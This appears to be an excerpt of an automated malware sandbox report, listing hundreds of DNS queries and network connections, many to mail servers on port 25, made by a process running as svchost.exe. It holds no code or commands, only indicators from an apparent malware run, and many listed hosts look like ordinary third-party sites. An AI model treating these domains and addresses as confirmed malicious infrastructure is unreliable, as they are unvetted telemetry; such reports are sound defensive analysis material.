                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.54.214 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.92.170 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.98.236.253 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pohlfood.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.86.6.113 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.38 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.130.159 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.6.17 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.236.62.147 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.104.28.238 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.178.104 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.224.212.222 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.41.152 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.177.67.59 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.165.223.27 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 207.180.198.201 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 68.71.135.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.185.0.4 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.168.185.204 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.201.52.102 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.18.40.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.15 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.12 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.246.117.171 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.222 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.76.70 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.216.241.100 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.128.23.153 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.82.115.227 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.227 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.251.116 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.207 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.231.224 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.163.170.48 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.195.90.46 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kevyt.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messaginguser.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 109.71.54.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.232.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.204.18.132 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.80.70 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.5.116.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.68 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.174.22.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.161.222.85 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.18.7.81 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.169.145.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.142.176.225 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anduran.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.64.150.164 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kursavto.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.209.11 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.4.16.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wnit.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: eos-i.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pleszew.policja.gov.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.211.245.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aluminox.es
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.216 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 138.201.65.187 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jchysk.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.239.201.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.0.29.214 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.88.50.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yumgiskor.kz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
